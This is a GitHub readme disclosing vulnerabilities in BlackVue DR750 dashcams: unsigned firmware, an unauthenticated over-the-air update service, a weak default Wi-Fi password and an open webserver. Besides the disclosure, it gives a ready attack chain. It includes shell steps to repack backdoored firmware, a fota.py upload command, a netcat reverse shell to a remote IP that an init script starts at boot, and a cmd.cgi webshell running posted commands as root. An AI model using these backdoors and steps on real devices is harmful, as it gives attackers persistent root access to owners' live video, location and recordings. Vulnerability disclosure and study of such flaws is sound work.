Skip to content

Latest commit

 

History

History
156 lines (114 loc) · 5.87 KB

readme.md

File metadata and controls

156 lines (114 loc) · 5.87 KB

BlackVue DR750 CVEs (+ more)

The below is for educational purposes only, do not try this on any device you do not own or have permission to use.

As of writing, there are about ~300 vulnerable BlackVue devices online, which can easily be discovered and exploited, and no official patch is out.

BlackVue was informed about these vulnerbilites 30-07-2022, and responded they would look into the issues. However, nothing has happened as far as we are aware.

Backdooring the device (CVE-2023-27748)

No Firmware Authentication Check

There is no authenticity check for the firmware, which allows a malicious attacker to upload a custom firmware. This custom firmare can include backdoors or exploits.

Steps to reproduce:

  1. Download a firmware archive from BlackVue's website
  2. Unpack the .zip containing the firmware files
  3. Unpack the image patch_<dashcam_name>.bin
  4. Change/add the files wanted (check Example Backdoors)
  5. tar.gz the image again
  6. Calculate the sue checksum for the new patch_<dashcam_name>.bin (check sue_checksum)
# downloaded from https://blackvue.com/download/dr750-2ch-lte-firmware-multilanguage/
$ unzip dr750-2ch-lte-v1.012-eng.zip
$ cd BlackVue/System/upgrade
$ mkdir patch-out
$ tar -C patch-out -xvzf patch_DR750LTE.bin
# make changes in patch-out
$ tar -C patch-out -czvf patch_DR750LTE.bin .
$ python3 sue_checksum.py patch_DR750LTE.bin patch_DR750LTE.bin.sue
$ cd ../../../

Then just place the folder BlackVue on the SD card of the dashcam, and it will start running it.

When creating a firmware for FOTA (Firmware Over The Air), then create a .tgz file of the System directory instead.

$ tar -C BlackVue/System -czvf fwupgrade.tgz

This file can then be used later to upload a custom firmware using FOTA and compromise a dashcam fully.

It is important to note that during testing, it was noted that even when flashing the official firmware from BlackVue's website back to the device, the backdoors placed persisted.

Unauthenticated FOTA (Firmware Over The Air) protocol

The BlackVue dashcams will listen on port 9771/TCP, where the FOTA (firmware over the air) service is running. This service allows to ping, restart, get device time, upgrade firmware, etc.

There is nothing protecting this endpoint and it can be accessed when connected to the same LAN as the dashcam or from the internet if the dashcam is connected to LTE, which is a significant security risk. A python script which can communicate with the FOTA service can be found here.

Create a new firmware based on the steps from the previous section, and upload it using the Python script.

python software/fota/fota.py 10.0.0.1 upgrade /tmp/fwupgrade.tgz

This utility comes with no guarantee that it works, but it has worked once before.

No firewall

The dashcams do not come with any firewall enabled, which is less of an issue if the dashcam is only connected via Wi-Fi. However, the LTE version is connected directly to the internet, as some mobile providers don't have a firewall set up and don't put their users behind NAT. This can be verified by looking at the extracted firmware.

At the very least the BlackVue dashcams with LTE should block connections on the LTE side.

Insecure default Wi-Fi password (CVE-2023-27746)

The default Wi-Fi password for the dashcam is only lowercase alphanumeric characters, with a length of 8. It is possible to intercept a handshake from the dashcam, and use tools from Aircrack-ng to calculate the password (if the user has not changed it). This can be done in approx ~4 days using rented hardware (~40 EUR).

Unauthenticated webserver (CVE-2023-27747)

By default the webserver can be accessed without authentication and exposes various endpoints.

├── blackvue_live.cgi
├── blackvue_livedata.cgi
├── blackvue_vod.cgi
├── Config
├── index.html
├── Record
└── upload.cgi

These endpoints allow the following:

  1. Live feed of the dashcam
  2. Live data feed (position, speed, etc.)
  3. Download all recordings from the dashcam
  4. Upload a custom config to the dashcam
  5. Download the current config from the dashcam 5.1. This includes potential Wi-Fi information that can be decrypted (see above)

Insecure storage of Wi-Fi password on SD-card

The Wi-Fi SSID and password of the network the dashcam will connect to are stored on the SD-card in the dashcam. This data is encrypted, but the key is easily revealed by reverse engineering the app. As demonstrated by wifi-decrypt.py.

It is also worth noting that when changing the Wi-Fi network the dashcam should connect to, these values are sent to BlackVue's servers, which will store it until they can send the information to the dashcam. Whether this data is deleted upon the dashcam becoming available is unknown.

Combining these attacks

All these can be combined into simple RCE, especially with the LTE dashcams.

  1. Craft a custom firmware with a backdoor
  2. Use fota.py to upload the firmware remotely
  3. Connect to backdoor
  4. ???
  5. Profit

Example backdoors

Some examples of backdoors, which could be included in custom firmware.

Netcat

The following backdoor, will connect to a remote machine and give full shell access as root.

/bin/backdoor.sh

#!/bin/sh
IP=$1
PORT=$2

while /bin/true; do
    /usr/bin/nc $IP $PORT -e /bin/sh
done

The following init.d script will start the backdoor at every boot, and connect to the given IP/port. /etc/init.d/S85backdoor

#!/bin/sh
/bin/backdoor 10.99.77.20 1745 &

cmd.cgi

The following backdoor will allow executing commands (as root), when a payload is sent to the webserver.

/res/System/www/cmd.cgi

#!/bin/sh

echo "Content-type: text/html"    # set the data-type we want to use
echo ""

POST_STRING=$(/bin/cat)
echo $POST_STRING
exec $POST_STRING